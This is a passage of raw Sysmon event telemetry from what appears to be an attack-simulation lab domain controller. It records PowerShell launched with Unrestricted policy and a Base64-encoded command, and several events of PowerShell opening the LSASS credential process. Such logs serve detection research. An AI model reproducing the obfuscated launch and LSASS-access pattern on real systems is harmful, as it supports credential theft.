CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.317{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.317{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.286{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_csbglc53.srw.ps12020-11-03 15:52:44.286 10341000x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.271{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7CCC-5FA1-C900-000000008801}48124792C:\Windows\system32\cmd.exe{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.251{D28789B6-7CCC-5FA1-CA00-000000008801}2816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBA